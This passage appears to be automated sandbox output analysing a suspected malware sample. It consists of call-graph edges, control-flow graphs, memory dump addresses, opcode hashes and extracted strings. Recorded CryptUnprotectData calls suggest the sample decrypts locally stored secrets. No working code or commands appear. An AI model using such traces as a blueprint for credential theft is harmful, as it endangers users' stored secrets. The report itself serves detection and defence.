42308->42308 42313 38247406 42311->42313 42312 38247700 42313->42312 42314 38244108 2 API calls 42313->42314 42315 38247447 42313->42315 42314->42315 42315->42312 42317 38248060 2 API calls 42315->42317 42318 3824804f 2 API calls 42315->42318 42316 382476d3 42316->42316 42317->42316 42318->42316 42321 38246fc2 42319->42321 42320 38246fa0 2 API calls 42323 3824722f 42320->42323 42321->42320 42322 38247028 42321->42322 42321->42323 42322->42284 42324 38244108 2 API calls 42323->42324 42325 38247382 42323->42325 42326 38247447 42323->42326 42324->42326 42325->42284 42326->42325 42328 38248060 2 API calls 42326->42328 42329 3824804f 2 API calls 42326->42329 42327 382476d3 42327->42327 42328->42327 42329->42327 42332 382475ea 42330->42332 42331 38247700 42332->42331 42334 38248060 2 API calls 42332->42334 42335 3824804f 2 API calls 42332->42335 42333 382476d3 42333->42333 42334->42333 42335->42333 42339 38244103 42336->42339 42338 38244540 42341 38244108 42338->42341 42340 382489d8 42339->42340 42382 38248308 42339->42382 42342 38244113 42341->42342 42343 38248400 2 API calls 42342->42343 42344 3824901f 42342->42344 42343->42344 42344->42288 42347 38249221 42345->42347 42348 38249321 42345->42348 42346 3824922d 42346->42289 42347->42346 42349 37d1faa1 2 API calls 42347->42349 42350 37d1fab0 2 API calls 42347->42350 42348->42289 42349->42348 42350->42348 42354 38249076 42351->42354 42352 382491c8 42352->42289 42353 38248400 2 API calls 42353->42354 42354->42352 42354->42353 42355 382491ea 42354->42355 42356 3824922d 42355->42356 42357 37d1faa1 2 API calls 42355->42357 42358 37d1fab0 2 API calls 42355->42358 42356->42289 42357->42356 42358->42356 42360 3824915d 42359->42360 42362 382491ea 42359->42362 42360->42359 42361 38248400 2 API calls 42360->42361 42361->42360 42363 3824922d 42362->42363 42364 37d1faa1 2 API calls 42362->42364 42365 37d1fab0 2 API calls 42362->42365 42363->42289 42364->42363 42365->42363 42369 3824840b 42366->42369 42367 382491c8 42367->42289 42368 38248400 2 API calls 42368->42369 42369->42367 42369->42368 42370 382491ea 42369->42370 42371 3824922d 42370->42371 42372 37d1faa1 2 API calls 42370->42372 42373 37d1fab0 2 API calls 42370->42373 42371->42289 42372->42371 42373->42371 42375 3824807d 42374->42375 42376 382480c1 42375->42376 42377 38244108 2 API calls 42375->42377 42376->42308 42377->42376 42379 3824807d 42378->42379 42380 38244108 2 API calls 42379->42380 42381 382480c1 42379->42381 42380->42381 42381->42308 42383 38248313 42382->42383 42384 38244108 2 API calls 42383->42384 42385 38248b55 42383->42385 42384->42385 42385->42338 42387 3824c54f 42386->42387 42388 3824d3bb 42387->42388 42390 3824c560 42387->42390 42388->42255 42391 3824d3f0 OleInitialize 42390->42391 42392 3824d454 42391->42392 42392->42388 42394 3824e708 DispatchMessageW 42393->42394 42395 3824e774 42394->42395 42395->42262

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 3824d608-3824d66b 1 3824d66d-3824d697 0->1 2 3824d69a-3824d6b8 0->2 1->2 7 3824d6c1-3824d6f8 2->7 8 3824d6ba-3824d6bc 2->8 12 3824d6fe-3824d712 7->12 13 3824db29 7->13 10 3824db7a-3824db8f 8->10 14 3824d714-3824d73e 12->14 15 3824d741-3824d760 12->15 16 3824db2e-3824db44 13->16 14->15 22 3824d762-3824d768 15->22 23 3824d778-3824d77a 15->23 16->10 25 3824d76c-3824d76e 22->25 26 3824d76a 22->26 27 3824d77c-3824d794 23->27 28 3824d799-3824d7a2 23->28 25->23 26->23 27->16 29 3824d7aa-3824d7b1 28->29 30 3824d7b3-3824d7b9 29->30 31 3824d7bb-3824d7c2 29->31 32 3824d7cf-3824d7ec call 3824c5c0 30->32 33 3824d7c4-3824d7ca 31->33 34 3824d7cc 31->34 37 3824d941-3824d945 32->37 38 3824d7f2-3824d7f9 32->38 33->32 34->32 40 3824db14-3824db27 37->40 41 3824d94b-3824d94f 37->41 38->13 39 3824d7ff-3824d83c 38->39 49 3824d842-3824d847 39->49 50 3824db0a-3824db0e 39->50 40->16 42 3824d951-3824d964 41->42 43 3824d969-3824d972 41->43 42->16 44 3824d974-3824d99e 43->44 45 3824d9a1-3824d9a8 43->45 44->45 47 3824da47-3824da5c 45->47 48 3824d9ae-3824d9b5 45->48 47->50 62 3824da62-3824da64 47->62 52 3824d9e4-3824da06 48->52 53 3824d9b7-3824d9e1 48->53 54 3824d879-3824d88e call 3824c5e4 49->54 55 3824d849-3824d857 call 3824c5cc 49->55 50->29 50->40 52->47 91 3824da08-3824da12 52->91 53->52 60 3824d893-3824d897 54->60 55->54 65 3824d859-3824d877 call 3824c5d8 55->65 66 3824d908-3824d915 60->66 67 3824d899-3824d8ab call 38240938 call 3824c5f0 60->67 68 3824da66-3824da9f 62->68 69 3824dab1-3824dace call 3824c5c0 62->69 65->60 66->50 83 3824d91b-3824d925 call 3824c600 66->83 94 3824d8ad-3824d8dd 67->94 95 3824d8eb-3824d903 67->95 86 3824daa1-3824daa7 68->86 87 3824daa8-3824daaf 68->87 69->50 82 3824dad0-3824dafc WaitMessage 69->82 88 3824db03 82->88 89 3824dafe 82->89 97 3824d934-3824d93c call 3824c618 83->97 98 3824d927-3824d92a call 3824c60c 83->98 86->87 87->50 88->50 89->88 102 3824da14-3824da1a 91->102 103 3824da2a-3824da45 91->103 109 3824d8e4 94->109 110 3824d8df 94->110 95->16 97->50 105 3824d92f 98->105 107 3824da1c 102->107 108 3824da1e-3824da20 102->108 103->47 103->91 105->50 107->103 108->103 109->95 110->109
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565914800.0000000038240000.00000040.00000800.00020000.00000000.sdmp, Offset: 38240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_38240000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID: $z%8$$z%8$$z%8$$z%8
                                                                                                            • API String ID: 2061451462-2180975965
                                                                                                            • Opcode ID: a69df4e1b02011e25218c0a6012c375630dad3f9a6527c7e51d7784915eb388e
                                                                                                            • Instruction ID: a81bc6be238cb916ca0c5c5119b4edff027fb969e3d82f38616ddb32ed3beca6
                                                                                                            • Opcode Fuzzy Hash: a69df4e1b02011e25218c0a6012c375630dad3f9a6527c7e51d7784915eb388e
                                                                                                            • Instruction Fuzzy Hash: 8CF13974A00309CFEB08DFA9C944B9DBBF2BF88304F568559E405AF265DB74A946CF90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2538278486.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (oq$4'q$4'q$4'q
                                                                                                            • API String ID: 0-2528434116
                                                                                                            • Opcode ID: 8a76438d3f74a19ad8d46d1b72f201caf5b34d92c04d65f26f4f13e6f747d6a5
                                                                                                            • Instruction ID: 87b8e75bc20ca37017f833feb1b4856e9db476d6c5a232109fe6278df5c78407
                                                                                                            • Opcode Fuzzy Hash: 8a76438d3f74a19ad8d46d1b72f201caf5b34d92c04d65f26f4f13e6f747d6a5
                                                                                                            • Instruction Fuzzy Hash: 17A27E70A04209CFCB15CF68C994AAEBBB2FF88301F158569E815DF261D734ED89CB61

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 640 155f90-155fc6 641 155fce-155fd4 640->641 768 155fc8 call 155f90 640->768 769 155fc8 call 1560e0 640->769 770 155fc8 call 155968 640->770 642 156024-156028 641->642 643 155fd6-155fda 641->643 646 15603f-156053 642->646 647 15602a-156039 642->647 644 155fdc-155fe1 643->644 645 155fe9-155ff0 643->645 644->645 650 1560c6-156103 645->650 651 155ff6-155ffd 645->651 652 15605b-156062 646->652 772 156055 call 158d90 646->772 773 156055 call 158da0 646->773 774 156055 call 1590a8 646->774 648 156065-15606f 647->648 649 15603b-15603d 647->649 654 156071-156077 648->654 655 156079-15607d 648->655 649->652 662 156105-15610b 650->662 663 15610e-15612e 650->663 651->642 653 155fff-156003 651->653 656 156005-15600a 653->656 657 156012-156019 653->657 658 156085-1560bf 654->658 655->658 660 15607f 655->660 656->657 657->650 661 15601f-156022 657->661 658->650 660->658 661->652 662->663 668 156135-15613c 663->668 669 156130 663->669 672 15613e-156149 668->672 671 1564c4-1564cd 669->671 673 1564d5-156511 672->673 674 15614f-156162 672->674 683 156513-156518 673->683 684 15651a-15651e 673->684 679 156164-156172 674->679 680 156178-156193 674->680 679->680 688 15644c-156453 679->688 686 156195-15619b 680->686 687 1561b7-1561ba 680->687 689 156524-156525 683->689 684->689 690 1561a4-1561a7 686->690 691 15619d 686->691 693 156314-15631a 687->693 694 1561c0-1561c3 687->694 688->671 692 156455-156457 688->692 696 1561da-1561e0 690->696 697 1561a9-1561ac 690->697 691->690 691->693 695 156406-156409 691->695 691->696 698 156466-15646c 692->698 699 156459-15645e 692->699 693->695 700 156320-156325 693->700 694->693 701 1561c9-1561cf 694->701 706 1564d0 695->706 707 15640f-156415 695->707 708 1561e6-1561e8 696->708 709 1561e2-1561e4 696->709 702 156246-15624c 697->702 703 1561b2 697->703 698->673 704 15646e-156473 698->704 699->698 700->695 701->693 705 1561d5 701->705 702->695 712 156252-156258 702->712 703->695 710 156475-15647a 704->710 711 1564b8-1564bb 704->711 705->695 706->673 713 156417-15641f 707->713 714 15643a-15643e 707->714 715 1561f2-1561fb 708->715 709->715 710->706 718 15647c 710->718 711->706 717 1564bd-1564c2 711->717 719 15625e-156260 712->719 720 15625a-15625c 712->720 713->673 721 156425-156434 713->721 714->688 716 156440-156446 714->716 722 1561fd-156208 715->722 723 15620e-156236 715->723 716->672 716->688 717->671 717->692 724 156483-156488 718->724 725 15626a-156281 719->725 720->725 721->680 721->714 722->695 722->723 743 15623c-156241 723->743 744 15632a-156360 723->744 728 1564aa-1564ac 724->728 729 15648a-15648c 724->729 735 156283-15629c 725->735 736 1562ac-1562d3 725->736 728->706 732 1564ae-1564b1 728->732 733 15648e-156493 729->733 734 15649b-1564a1 729->734 732->711 733->734 734->673 738 1564a3-1564a8 734->738 735->744 747 1562a2-1562a7 735->747 736->706 749 1562d9-1562dc 736->749 738->728 739 15647e-156481 738->739 739->706 739->724 743->744 750 156362-156366 744->750 751 15636d-156375 744->751 747->744 749->706 752 1562e2-15630b 749->752 753 156385-156389 750->753 754 156368-15636b 750->754 751->706 755 15637b-156380 751->755 752->744 767 15630d-156312 752->767 756 1563a8-1563ac 753->756 757 15638b-156391 753->757 754->751 754->753 755->695 760 1563b6-1563d5 call 1566b8 756->760 761 1563ae-1563b4 756->761 757->756 759 156393-15639b 757->759 759->706 762 1563a1-1563a6 759->762 764 1563db-1563df 760->764 761->760 761->764 762->695 764->695 765 1563e1-1563fd 764->765 765->695 767->744 768->641 769->641 770->641 772->652 773->652 774->652
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2538278486.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (oq$(oq$(oq
                                                                                                            • API String ID: 0-3376450984
                                                                                                            • Opcode ID: b06c0874bbd20a63cbbff06f593e7ead13beb318cdc3dc85265650d3a9e7f6fb
                                                                                                            • Instruction ID: c70892db46e93a4dacda3d15894800558094473c4fc04aeb1538cfcf79d9fbf7
                                                                                                            • Opcode Fuzzy Hash: b06c0874bbd20a63cbbff06f593e7ead13beb318cdc3dc85265650d3a9e7f6fb
                                                                                                            • Instruction Fuzzy Hash: 03124030A00219DFCB14CF69C994AADBBF2BF98316F958069E8259F261D731DD85CB90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1329 3824e7c8-3824e7f3 1330 3824e7f5 1329->1330 1331 3824e7fa-3824e85a 1329->1331 1330->1331 1333 3824e860-3824e971 1331->1333 1334 3824eb8d-3824ebb5 1331->1334 1376 3824e973-3824e97f 1333->1376 1377 3824e99b 1333->1377 1337 3824f340-3824f368 1334->1337 1338 3824ebbb-3824ebe8 1334->1338 1344 3824f601 1337->1344 1345 3824f36e-3824f5cf call 153168 call 37d1cc28 1337->1345 1342 3824eee6-3824f251 1338->1342 1343 3824ebee-3824edf2 1338->1343 1490 3824f253-3824f268 1342->1490 1491 3824f26a-3824f27b 1342->1491 1445 3824edf4-3824ee09 1343->1445 1446 3824ee0b-3824ee1c 1343->1446 1347 3824f602-3824f609 1344->1347 1471 3824f5d4-3824f5d6 1345->1471 1382 3824e981-3824e987 1376->1382 1383 3824e989-3824e98f 1376->1383 1378 3824e9a1-3824eb43 1377->1378 1458 3824eb45-3824eb51 1378->1458 1459 3824eb52-3824eb53 1378->1459 1384 3824e999 1382->1384 1383->1384 1384->1378 1454 3824ee1d-3824eee1 1445->1454 1446->1454 1482 3824f33f 1454->1482 1458->1459 1459->1334 1471->1347 1482->1337 1494 3824f27c-3824f33e 1490->1494 1491->1494 1494->1482
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565914800.0000000038240000.00000040.00000800.00020000.00000000.sdmp, Offset: 38240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_38240000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Teq$pHq
                                                                                                            • API String ID: 0-1765197316
                                                                                                            • Opcode ID: bf5804515b86efe2dac5d53fdd88e4d45f43c6fd0628f0b8c9e1540776d56eed
                                                                                                            • Instruction ID: 2b8152148fbcccf9f8f362f2c640b2cf4ab411bd432ea6e4b13d50c8e52e9282
                                                                                                            • Opcode Fuzzy Hash: bf5804515b86efe2dac5d53fdd88e4d45f43c6fd0628f0b8c9e1540776d56eed
                                                                                                            • Instruction Fuzzy Hash: 6582A474A01318CFDB29DF64C895B99B7B2FB89301F1085E9E9096B354CB35AE82CF54

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1506 37d1bdf0-37d1be10 1507 37d1be12 1506->1507 1508 37d1be17-37d1be77 1506->1508 1507->1508 1510 37d1c1aa-37d1c1d2 1508->1510 1511 37d1be7d-37d1bf8e 1508->1511 1514 37d1c959-37d1c981 1510->1514 1515 37d1c1d8-37d1c1ff 1510->1515 1553 37d1bf90-37d1bf9c 1511->1553 1554 37d1bfb8 1511->1554 1521 37d1cc10 1514->1521 1522 37d1c987-37d1cbdd call 153168 call 37d1cc28 1514->1522 1519 37d1c205-37d1c40a 1515->1519 1520 37d1c4fe-37d1c86a 1515->1520 1622 37d1c423-37d1c434 1519->1622 1623 37d1c40c-37d1c421 1519->1623 1666 37d1c883-37d1c894 1520->1666 1667 37d1c86c-37d1c881 1520->1667 1524 37d1cc11-37d1cc17 1521->1524 1648 37d1cbe3-37d1cbe5 1522->1648 1559 37d1bfa6-37d1bfac 1553->1559 1560 37d1bf9e-37d1bfa4 1553->1560 1556 37d1bfbe-37d1c160 1554->1556 1634 37d1c162-37d1c16e 1556->1634 1635 37d1c16f 1556->1635 1561 37d1bfb6 1559->1561 1560->1561 1561->1556 1629 37d1c435-37d1c4f9 1622->1629 1623->1629 1658 37d1c958 1629->1658 1634->1635 1635->1510 1648->1524 1658->1514 1670 37d1c895-37d1c957 1666->1670 1667->1670 1670->1658
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Teq$pHq
                                                                                                            • API String ID: 0-1765197316
                                                                                                            • Opcode ID: 4f368f9f3203788b84e88e794d23f4850363e1f5d8d69109d7b397dc877d8082
                                                                                                            • Instruction ID: bcaa92e67f31f7e94e30b3a8a947820102af09a713f19babc6f37aa71181d6fa
                                                                                                            • Opcode Fuzzy Hash: 4f368f9f3203788b84e88e794d23f4850363e1f5d8d69109d7b397dc877d8082
                                                                                                            • Instruction Fuzzy Hash: 4C72B374A01318CFDB69DF64C955B99B7B2FB89300F1081E9E909AB354CB35AE82CF54

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2185 154328-154368 2187 15436f-15444c call 153168 call 152c88 2185->2187 2188 15436a 2185->2188 2198 154453-154471 2187->2198 2199 15444e 2187->2199 2188->2187 2229 154474 call 154620 2198->2229 2230 154474 call 15461d 2198->2230 2199->2198 2200 15447a-154485 2201 154487 2200->2201 2202 15448c-154490 2200->2202 2201->2202 2203 154495-15449c 2202->2203 2204 154492-154493 2202->2204 2206 1544a3-1544b1 2203->2206 2207 15449e 2203->2207 2205 1544b4-1544f8 2204->2205 2211 15455e-154575 2205->2211 2206->2205 2207->2206 2213 154577-15459c 2211->2213 2214 1544fa-154510 2211->2214 2223 1545b4 2213->2223 2224 15459e-1545b3 2213->2224 2218 154512-15451e 2214->2218 2219 15453a 2214->2219 2220 154520-154526 2218->2220 2221 154528-15452e 2218->2221 2222 154540-15455d 2219->2222 2225 154538 2220->2225 2221->2225 2222->2211 2224->2223 2225->2222 2229->2200 2230->2200
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2538278486.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PHq$PHq
                                                                                                            • API String ID: 0-1274609152
                                                                                                            • Opcode ID: 5bfd29559f71a7662b26dd514e1bf7fcb0e0c27916b6a6ded3957e9b4ee3238e
                                                                                                            • Instruction ID: e2e71ec02aa0f5e8f047b21eda40596f987ddf2d69176a60ee677c63a50e399b
                                                                                                            • Opcode Fuzzy Hash: 5bfd29559f71a7662b26dd514e1bf7fcb0e0c27916b6a6ded3957e9b4ee3238e
                                                                                                            • Instruction Fuzzy Hash: AE91C774D00218CFDB18DFA9D984A9DBBF2BF89305F148069E819AB365DB349985CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2538278486.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (oq
                                                                                                            • API String ID: 0-1999159160
                                                                                                            • Opcode ID: f468c35d47eeefc95467108e1d51a4c2b3053a74acd6911434268dccc7dc6b68
                                                                                                            • Instruction ID: b1719a1e043ee28d9e7f7a84f778e7c8ef7f82fea94e61807e41c5acefdab64a
                                                                                                            • Opcode Fuzzy Hash: f468c35d47eeefc95467108e1d51a4c2b3053a74acd6911434268dccc7dc6b68
                                                                                                            • Instruction Fuzzy Hash: 01128E71A00609CFDB14DFA9D854BAEBBB7FF88301F248129E8159B391DB349D85CB90
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000D0,?,00000000,?,?,?,?), ref: 350CDA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: b4f0b7a9d518f378ae35ab62ae7f6e0433e0bfd655cc7ee2673e60056a5a67c7
                                                                                                            • Instruction ID: 0a4949e802d63d59bb5fe48cab296d760ea34157b059fcd178ed81d255bfe516
                                                                                                            • Opcode Fuzzy Hash: b4f0b7a9d518f378ae35ab62ae7f6e0433e0bfd655cc7ee2673e60056a5a67c7
                                                                                                            • Instruction Fuzzy Hash: C21146B6800249EFDB10CF99D944BDEBBF1EF48320F148459EA68A7251C339A650DFA5
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000D0,?,00000000,?,?,?,?), ref: 350CDA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: 81b0e9b9d63793e2a2433d0456e7f80eec8d96b73ea985fba2f7a5fbac406f01
                                                                                                            • Instruction ID: 692dabfb6f47ec744d9422640024c6580090eea4e2061de243ed8a1be833b619
                                                                                                            • Opcode Fuzzy Hash: 81b0e9b9d63793e2a2433d0456e7f80eec8d96b73ea985fba2f7a5fbac406f01
                                                                                                            • Instruction Fuzzy Hash: 51116A76800349EFDB10CF99D805BDEBBF4EF48320F148459E914A7250C379A550CFA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^5
                                                                                                            • API String ID: 0-1414569577
                                                                                                            • Opcode ID: 7a5d865df3231e4dcb56d753b9276959d9b5dac239a5e5366573c718f11e5e08
                                                                                                            • Instruction ID: f9acf01d86f15e17bcb29ff68e41d5be9543881b96cfe9a45f7067b419832b96
                                                                                                            • Opcode Fuzzy Hash: 7a5d865df3231e4dcb56d753b9276959d9b5dac239a5e5366573c718f11e5e08
                                                                                                            • Instruction Fuzzy Hash: 6CA192B4E012188FEB68CF6AD944B9DFBF2AF89300F14C0AAD409B7255DB745A85CF51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^5
                                                                                                            • API String ID: 0-1414569577
                                                                                                            • Opcode ID: 75cbf79aa5d99d542ca05f9d06c248ceff6fd944a67699d5c46daf337500b14a
                                                                                                            • Instruction ID: 767b43d4d3c29a37a419a28cc249821f1776b24f1ae5d5749bf9c7289f001529
                                                                                                            • Opcode Fuzzy Hash: 75cbf79aa5d99d542ca05f9d06c248ceff6fd944a67699d5c46daf337500b14a
                                                                                                            • Instruction Fuzzy Hash: 55A1A3B5E01218CFEB58CF6AD984B9DFBF2AF89310F14C0AAD408A7255DB345A85CF51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^5
                                                                                                            • API String ID: 0-1414569577
                                                                                                            • Opcode ID: 5f9036684cb13bc7a0dea0bea02cac5610a1f1c5f72824e394709725fdce6ea1
                                                                                                            • Instruction ID: 99c1238dbb9755052b4dd836cd7ffa3770fd311ea3f4398cae2f5f4ddda1e63b
                                                                                                            • Opcode Fuzzy Hash: 5f9036684cb13bc7a0dea0bea02cac5610a1f1c5f72824e394709725fdce6ea1
                                                                                                            • Instruction Fuzzy Hash: B2A1A1B4E012588FEB68CF6AD944B9DFBF2BF89300F14D0AAD409A7255DB305A85CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^5
                                                                                                            • API String ID: 0-1414569577
                                                                                                            • Opcode ID: 38b586d5e2eb89ab6373a09839f4111d37a50f56b9b095d381872d9883bd3e19
                                                                                                            • Instruction ID: 22e2272106c13f061f5d503bb5263818f6f30b56cc78c5b57e2631c2bcbc1681
                                                                                                            • Opcode Fuzzy Hash: 38b586d5e2eb89ab6373a09839f4111d37a50f56b9b095d381872d9883bd3e19
                                                                                                            • Instruction Fuzzy Hash: 2DA195B4E012188FEB64CF6AD984B9DFBF2AF89301F14C1AAD408B7255DB345A85CF51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^5
                                                                                                            • API String ID: 0-1414569577
                                                                                                            • Opcode ID: 43a9c70d602bce2f871301bbd3446341332b8c27cd8d85ac3c3af0466c7e36a1
                                                                                                            • Instruction ID: 5d913a7edebf59b23edd0a2877ff7aacd2dcb5704fd92dcfef7a34d09476b9e2
                                                                                                            • Opcode Fuzzy Hash: 43a9c70d602bce2f871301bbd3446341332b8c27cd8d85ac3c3af0466c7e36a1
                                                                                                            • Instruction Fuzzy Hash: 2771A3B4E006588FEB68CF66D944B9DFBF2AF88300F14C1AAD40DA7254DB304A85CF51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^5
                                                                                                            • API String ID: 0-1414569577
                                                                                                            • Opcode ID: c24c9eef33cee75f35d6df1ae91ab5c8fba24c9b0d2bc99981ff23b2de8b221f
                                                                                                            • Instruction ID: 5cab7417d8f2b4c263ad011b1b20e8189a35f814d66bbcafd6754235d9b4fc93
                                                                                                            • Opcode Fuzzy Hash: c24c9eef33cee75f35d6df1ae91ab5c8fba24c9b0d2bc99981ff23b2de8b221f
                                                                                                            • Instruction Fuzzy Hash: CA7195B5D016188FEB68CF6AD944B9DFBF2AF88300F14C1AAD40CA7255DB345A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b1c3a6a2234e17fad5b576f618f45fd6ee4561a3865679c9904ca4aeec983d68
                                                                                                            • Instruction ID: 5d180282392614a13d85f6d733897f1c1bfb2a2910e8c3bab45b5abe11c9b67b
                                                                                                            • Opcode Fuzzy Hash: b1c3a6a2234e17fad5b576f618f45fd6ee4561a3865679c9904ca4aeec983d68
                                                                                                            • Instruction Fuzzy Hash: 1972DF74E002288FEB64DF69C984BD9FBB2BB59310F5081E9D449AB351DB34AE81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08ad0f4776f93691c4c06e302aae4139d92018b58c3f6fefbd50ea256307f96f
                                                                                                            • Instruction ID: aa6efdbb31f71a67c591371c79d2cc4abbc78b8ee262ebdb2a6fa8d79ad18e15
                                                                                                            • Opcode Fuzzy Hash: 08ad0f4776f93691c4c06e302aae4139d92018b58c3f6fefbd50ea256307f96f
                                                                                                            • Instruction Fuzzy Hash: 2AE1E374E01218CFEB14CFA5D954B9DBBB2BF8A300F2081A9D419BB395DB355A86CF10
                                                                                                            Memory Dump Source
